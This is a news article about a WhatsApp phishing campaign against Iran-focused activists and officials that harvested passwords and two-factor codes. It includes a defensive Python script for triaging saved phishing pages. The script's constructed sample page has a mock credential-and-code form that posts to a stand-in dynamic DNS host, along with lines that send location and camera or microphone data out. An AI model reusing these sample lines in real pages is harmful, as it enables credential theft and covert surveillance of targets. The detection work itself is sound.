Fri. Feb 6th, 2026

A sophisticated phishing campaign targeting individuals connected to Iran-related activities has been uncovered following a warning by UK-based Iranian activist Nariman Gharib, who on Tuesday shared redacted screenshots of a suspicious WhatsApp message sent to him.

Gharib, who monitors the digital dimension of Iran's ongoing protests from outside the country, cautioned people against clicking unsolicited links, noting that the attack appeared aimed at activists, journalists, academics, and other influential figures engaged with Iran-focused issues.

An analysis of the phishing link by TechCrunch, supported by independent security researchers, revealed that the campaign was designed to steal Gmail and other online credentials, hijack WhatsApp accounts, and potentially conduct surveillance. The phishing page was hosted on a hostname provided by a dynamic DNS service, which let the operators present a legitimate-looking address while obscuring where the malicious site was actually hosted.

Investigators also discovered that the attackers had left their server exposed, allowing real-time access to data entered by victims. This data showed that dozens of people had unknowingly submitted sensitive information, including passwords and two-factor authentication codes.

The exposed records indicated a wide range of victims, including a Middle Eastern academic in national security studies, a senior Lebanese cabinet minister, the head of an Israeli drone company, journalists, and individuals based in or linked to the United States. In some cases, victims were tricked into scanning QR codes that could link their WhatsApp accounts to devices controlled by the attackers. Security researchers said the phishing code also attempted to request access to victims' locations, microphones, and cameras, raising concerns about possible real-time surveillance, although no such media files were found on the server.
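The behaviours described above (a credential and two-factor code harvesting form, a page hosted under a dynamic DNS hostname, and scripts that ask the browser for location, microphone and camera access) are all visible in the static HTML and JavaScript of a phishing page before anyone submits anything. The following script is an added illustration written for this article, not code from TechCrunch or from the analysts involved, showing how a responder could triage a fetched copy of such a page offline. The dynamic DNS suffix list and the sample page are constructed for the example and do not describe the campaign's actual infrastructure.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: an illustrative, non-exhaustive list of well-known dynamic DNS
# provider suffixes. Not taken from the article; extend it for real triage.
DYNAMIC_DNS_SUFFIXES = (
    "duckdns.org", "no-ip.org", "no-ip.com", "ddns.net", "hopto.org",
    "dynu.net", "freedns.afraid.org", "myftp.biz", "zapto.org",
)

# Browser APIs a page has to call to obtain a visitor's location, camera or
# microphone. Each one triggers a permission prompt, which is the point a
# cautious user can still refuse.
GEOLOCATION_API = re.compile(r"navigator\.geolocation\.(getCurrentPosition|watchPosition)")
MEDIA_API = re.compile(r"navigator\.mediaDevices\.getUserMedia|navigator\.getUserMedia")

# Heuristic for a one-time-code field, based on common attribute wording.
OTP_HINT = re.compile(r"\b(otp|2fa|totp|verification|one[- ]?time|auth(entication)?[ _-]?code)\b", re.I)


def is_dynamic_dns_host(hostname: str) -> bool:
    """True if the hostname is the suffix itself or a subdomain of it."""
    host = hostname.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in DYNAMIC_DNS_SUFFIXES)


class _PageScanner(HTMLParser):
    """Collects form targets, credential/OTP inputs and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.form_actions, self.scripts = [], []
        self.password_fields = self.otp_like_fields = 0
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])
        elif tag == "input":
            if (a.get("type") or "").lower() == "password":
                self.password_fields += 1
                return
            blob = " ".join(v for v in (a.get("name"), a.get("id"), a.get("placeholder")) if v)
            if (a.get("autocomplete") or "").lower() == "one-time-code" or OTP_HINT.search(blob):
                self.otp_like_fields += 1
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:  # HTMLParser delivers <script> bodies as raw data
            self.scripts.append(data)


def triage_phishing_page(html: str, page_url: str) -> dict:
    """Return the indicators a responder would want from a saved phishing page."""
    scanner = _PageScanner()
    scanner.feed(html)
    scanner.close()
    js = "\n".join(scanner.scripts)
    exfil_hosts = {h for h in (urlparse(act).hostname for act in scanner.form_actions) if h}
    page_host = urlparse(page_url).hostname or ""
    return {
        "page_host_is_dynamic_dns": is_dynamic_dns_host(page_host),
        "password_fields": scanner.password_fields,
        "otp_like_fields": scanner.otp_like_fields,
        "requests_geolocation": bool(GEOLOCATION_API.search(js)),
        "requests_camera_or_microphone": bool(MEDIA_API.search(js)),
        "exfil_hosts": sorted(exfil_hosts),
        "exfil_to_dynamic_dns": any(is_dynamic_dns_host(h) for h in exfil_hosts),
    }


# Constructed sample page for the example; it is not the campaign's real page.
SAMPLE_HTML = """
<html><body>
<form method="post" action="https://login-verify.duckdns.org/collect">
  <input name="email" type="text" placeholder="Email">
  <input name="passwd" type="password" placeholder="Password">
  <input name="otp" type="text" autocomplete="one-time-code" placeholder="Verification code">
  <button>Sign in</button>
</form>
<img src="qr.png" alt="Scan with WhatsApp">
<script>
  navigator.geolocation.getCurrentPosition(function (pos) { send(pos.coords); });
  navigator.mediaDevices.getUserMedia({audio: true, video: true}).then(s => upload(s));
</script>
</body></html>
"""

if __name__ == "__main__":
    for key, value in triage_phishing_page(SAMPLE_HTML, "https://login-verify.duckdns.org/").items():
        print(f"{key}: {value}")
```

The script only reads a saved copy of the page; it never loads it in a browser, so no permission prompt fires and nothing is sent to the operators. It also cannot detect the QR-code device-linking trick, which abuses a legitimate WhatsApp feature rather than anything in the page code; the check for that is in WhatsApp itself, under Linked devices, where any unrecognised session should be logged out.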

While the phishing site has since been taken down, the identity and motive of those behind the campaign remain unclear. Some experts believe the attack bears the hallmarks of an espionage operation possibly linked to Iran’s Islamic Revolutionary Guard Corps, given the timing during nationwide protests and the targeting of high value individuals.

Others suggest the infrastructure points to a financially motivated cybercrime group, noting that Iran has previously outsourced cyber operations to criminal actors. Regardless of attribution, security experts warned that the incident underscores the growing risks of unsolicited messaging links and the heightened cyber threats surrounding geopolitical crises.
